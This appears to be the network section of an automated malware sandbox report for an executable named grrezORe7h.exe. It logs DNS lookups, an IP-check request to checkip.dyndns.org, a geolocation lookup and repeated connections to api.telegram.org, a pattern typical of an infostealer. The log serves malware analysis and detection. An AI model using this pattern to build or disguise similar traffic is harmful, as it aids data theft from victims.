Jan 11, 2025 07:24:45.068990946 CET	443	50052	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:45.069056034 CET	443	50052	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:45.069199085 CET	50052	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:45.069587946 CET	50052	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:45.072227001 CET	50051	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:45.072993040 CET	50053	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:45.077210903 CET	80	50051	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:45.077328920 CET	50051	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:45.077790976 CET	80	50053	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:45.077892065 CET	50053	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:45.078433037 CET	50053	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:45.083159924 CET	80	50053	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:46.205355883 CET	80	50053	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:46.207307100 CET	50054	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:46.207349062 CET	443	50054	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:46.207480907 CET	50054	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:46.207813978 CET	50054	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:46.207827091 CET	443	50054	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:46.248102903 CET	50053	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:46.847054005 CET	443	50054	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:46.849195004 CET	50054	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:46.849208117 CET	443	50054	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:46.849371910 CET	50054	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:46.849376917 CET	443	50054	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:47.160439014 CET	443	50054	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:47.160641909 CET	443	50054	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:47.160707951 CET	50054	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:47.161029100 CET	50054	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:47.164892912 CET	50053	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:47.166115999 CET	50055	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:47.169974089 CET	80	50053	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:47.170059919 CET	50053	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:47.170983076 CET	80	50055	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:47.171060085 CET	50055	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:47.171161890 CET	50055	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:47.177661896 CET	80	50055	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:48.144056082 CET	80	50055	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:48.145528078 CET	50056	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:48.145570040 CET	443	50056	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:48.145664930 CET	50056	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:48.145955086 CET	50056	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:48.145976067 CET	443	50056	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:48.185512066 CET	50055	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:48.785193920 CET	443	50056	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:48.787429094 CET	50056	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:48.787456036 CET	443	50056	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:48.787560940 CET	50056	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:48.787566900 CET	443	50056	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:49.081020117 CET	443	50056	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:49.081095934 CET	443	50056	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:49.081172943 CET	50056	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:49.081649065 CET	50056	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:49.084645033 CET	50055	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:49.085916996 CET	50057	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:49.089576960 CET	80	50055	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:49.089653969 CET	50055	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:49.090646982 CET	80	50057	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:49.090711117 CET	50057	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:49.090821981 CET	50057	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:49.096013069 CET	80	50057	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:49.716588974 CET	80	50057	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:49.723318100 CET	50058	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:49.723361015 CET	443	50058	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:49.723447084 CET	50058	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:49.723706007 CET	50058	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:49.723721981 CET	443	50058	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:49.763643980 CET	50057	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:50.346640110 CET	443	50058	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:50.348965883 CET	50058	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:50.348999977 CET	443	50058	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:50.349179029 CET	50058	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:50.349186897 CET	443	50058	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:50.562974930 CET	443	50058	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:50.563045025 CET	443	50058	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:50.563119888 CET	50058	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:50.563628912 CET	50058	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:50.567373037 CET	50057	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:50.568176031 CET	50059	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:50.572616100 CET	80	50057	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:50.573208094 CET	50057	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:50.574119091 CET	80	50059	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:50.574187040 CET	50059	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:50.574296951 CET	50059	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:50.579252958 CET	80	50059	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:51.204070091 CET	80	50059	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:51.206513882 CET	50060	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:51.206562042 CET	443	50060	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:51.206638098 CET	50060	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:51.206975937 CET	50060	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:51.206991911 CET	443	50060	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:51.248083115 CET	50059	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:51.817965031 CET	443	50060	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:51.822062016 CET	50060	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:51.822089911 CET	443	50060	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:51.822154999 CET	50060	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:51.822164059 CET	443	50060	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:52.212805033 CET	443	50060	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:52.212883949 CET	443	50060	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:52.212986946 CET	50060	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:52.242337942 CET	50060	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:52.247015953 CET	50059	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:52.248044014 CET	50061	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:52.266983986 CET	80	50061	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:52.267261028 CET	50061	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:52.270922899 CET	50061	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:52.274068117 CET	80	50059	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:52.274156094 CET	50059	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:52.275738955 CET	80	50061	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:53.232875109 CET	80	50061	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:53.234632969 CET	50062	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:53.234678984 CET	443	50062	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:53.234766960 CET	50062	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:53.235163927 CET	50062	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:53.235176086 CET	443	50062	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:53.279335976 CET	50061	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:53.872270107 CET	443	50062	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:53.875288010 CET	50062	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:53.875304937 CET	443	50062	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:53.875371933 CET	50062	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:53.875380993 CET	443	50062	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:54.266159058 CET	443	50062	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:54.266323090 CET	443	50062	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:54.266567945 CET	50062	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:54.267095089 CET	50062	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:54.270770073 CET	50061	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:54.271909952 CET	50063	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:54.275801897 CET	80	50061	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:54.276706934 CET	80	50063	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:54.276824951 CET	50061	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:54.276849985 CET	50063	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:54.277167082 CET	50063	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:54.282001972 CET	80	50063	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:54.903897047 CET	80	50063	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:54.951323032 CET	50063	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:54.993385077 CET	50064	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:54.993443966 CET	443	50064	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:54.993556023 CET	50064	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:54.997816086 CET	50064	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:54.997839928 CET	443	50064	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:55.612932920 CET	443	50064	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:55.614892960 CET	50064	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:55.614922047 CET	443	50064	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:55.615067959 CET	50064	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:55.615073919 CET	443	50064	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:56.121094942 CET	443	50064	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:56.121179104 CET	443	50064	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:56.121284962 CET	50064	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:56.121973038 CET	50064	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:56.126394033 CET	50063	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:56.127607107 CET	50065	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:56.131452084 CET	80	50063	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:56.131571054 CET	50063	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:56.132368088 CET	80	50065	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:56.132458925 CET	50065	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:56.132576942 CET	50065	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:56.137353897 CET	80	50065	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:57.528477907 CET	80	50065	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:57.530136108 CET	50066	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:57.530200005 CET	443	50066	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:57.530277967 CET	50066	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:57.530580997 CET	50066	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:57.530599117 CET	443	50066	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:57.576344013 CET	50065	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:58.135571003 CET	443	50066	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:58.137789965 CET	50066	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:58.137815952 CET	443	50066	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:58.137868881 CET	50066	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:58.137878895 CET	443	50066	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:58.424531937 CET	443	50066	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:58.424609900 CET	443	50066	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:58.424777985 CET	50066	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:58.425611973 CET	50066	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:58.429389954 CET	50065	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:58.430808067 CET	50067	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:58.434391975 CET	80	50065	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:58.434495926 CET	50065	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:58.435633898 CET	80	50067	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:58.435728073 CET	50067	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:58.435825109 CET	50067	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:58.440629005 CET	80	50067	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:59.092860937 CET	80	50067	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:59.108793974 CET	50068	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:59.108848095 CET	443	50068	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:59.108944893 CET	50068	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:59.109217882 CET	49816	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:59.109584093 CET	50068	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:59.109601974 CET	443	50068	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:59.138818026 CET	50067	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:59.722229958 CET	443	50068	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:59.729645014 CET	50068	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:59.729676962 CET	443	50068	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:59.729744911 CET	50068	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:59.729756117 CET	443	50068	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:59.947499037 CET	443	50068	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:59.947681904 CET	443	50068	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:59.947788000 CET	50068	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:59.948225975 CET	50068	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:59.951731920 CET	50067	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:59.952847958 CET	50069	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:59.956672907 CET	80	50067	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:59.956743002 CET	50067	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:59.957628965 CET	80	50069	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:59.957701921 CET	50069	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:59.957814932 CET	50069	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:59.962543011 CET	80	50069	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:01.718718052 CET	80	50069	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:01.720290899 CET	50070	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:01.720356941 CET	443	50070	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:01.720454931 CET	50070	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:01.720803022 CET	50070	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:01.720824957 CET	443	50070	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:01.763871908 CET	50069	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:02.356122017 CET	443	50070	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:02.358124971 CET	50070	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:02.358170033 CET	443	50070	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:02.358258963 CET	50070	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:02.358268023 CET	443	50070	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:02.687109947 CET	443	50070	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:02.687351942 CET	443	50070	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:02.687468052 CET	50070	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:02.691664934 CET	50070	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:02.712093115 CET	50069	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:02.713099003 CET	50071	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:02.717003107 CET	80	50069	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:02.717080116 CET	50069	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:02.717845917 CET	80	50071	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:02.717926025 CET	50071	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:02.718065023 CET	50071	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:02.722794056 CET	80	50071	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:09.606848955 CET	80	50071	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:09.608819008 CET	50072	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:09.608854055 CET	443	50072	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:09.608935118 CET	50072	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:09.609249115 CET	50072	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:09.609260082 CET	443	50072	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:09.654485941 CET	50071	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:10.262428045 CET	443	50072	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:10.310720921 CET	50072	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:12.622302055 CET	50072	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:12.622315884 CET	443	50072	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:12.622437954 CET	50072	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:12.622446060 CET	443	50072	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:13.006077051 CET	443	50072	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:13.006189108 CET	443	50072	149.154.167.220	192.168.2.4
Jan 11, 2025 07:25:13.006294012 CET	50072	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:13.006870985 CET	50072	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:25:13.009816885 CET	50071	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:13.010929108 CET	50073	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:13.014878988 CET	80	50071	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:13.014978886 CET	50071	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:13.015724897 CET	80	50073	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:13.015800953 CET	50073	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:13.015896082 CET	50073	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:25:13.020693064 CET	80	50073	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:14.402019024 CET	80	50073	193.122.6.168	192.168.2.4
Jan 11, 2025 07:25:14.451390028 CET	50073	80	192.168.2.4	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 07:23:53.720627069 CET	56244	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:23:53.727221966 CET	53	56244	1.1.1.1	192.168.2.4
Jan 11, 2025 07:23:54.962833881 CET	57631	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:23:54.970412970 CET	53	57631	1.1.1.1	192.168.2.4
Jan 11, 2025 07:23:59.171855927 CET	62023	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:23:59.178694963 CET	53	62023	1.1.1.1	192.168.2.4
Jan 11, 2025 07:24:00.899852991 CET	57293	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:24:00.907324076 CET	53	57293	1.1.1.1	192.168.2.4
Jan 11, 2025 07:24:07.591741085 CET	60993	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:24:07.598730087 CET	53	60993	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 07:23:53.720627069 CET	192.168.2.4	1.1.1.1	0x2008	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:23:54.962833881 CET	192.168.2.4	1.1.1.1	0xae98	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:23:59.171855927 CET	192.168.2.4	1.1.1.1	0xfe5b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:00.899852991 CET	192.168.2.4	1.1.1.1	0xb30	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:07.591741085 CET	192.168.2.4	1.1.1.1	0xaec0	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 07:23:53.727221966 CET	1.1.1.1	192.168.2.4	0x2008	No error (0)	drive.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:23:54.970412970 CET	1.1.1.1	192.168.2.4	0xae98	No error (0)	drive.usercontent.google.com		142.250.185.225	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:23:59.178694963 CET	1.1.1.1	192.168.2.4	0xfe5b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:23:59.178694963 CET	1.1.1.1	192.168.2.4	0xfe5b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:23:59.178694963 CET	1.1.1.1	192.168.2.4	0xfe5b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:23:59.178694963 CET	1.1.1.1	192.168.2.4	0xfe5b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:23:59.178694963 CET	1.1.1.1	192.168.2.4	0xfe5b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:23:59.178694963 CET	1.1.1.1	192.168.2.4	0xfe5b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:00.907324076 CET	1.1.1.1	192.168.2.4	0xb30	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:00.907324076 CET	1.1.1.1	192.168.2.4	0xb30	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:00.907324076 CET	1.1.1.1	192.168.2.4	0xb30	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:00.907324076 CET	1.1.1.1	192.168.2.4	0xb30	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:00.907324076 CET	1.1.1.1	192.168.2.4	0xb30	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:00.907324076 CET	1.1.1.1	192.168.2.4	0xb30	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:00.907324076 CET	1.1.1.1	192.168.2.4	0xb30	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:24:07.598730087 CET	1.1.1.1	192.168.2.4	0xaec0	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49754	193.122.6.168	80	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:23:59.187527895 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 07:23:59.817672014 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:23:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 07:23:59.821974039 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 07:24:00.008609056 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:23:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
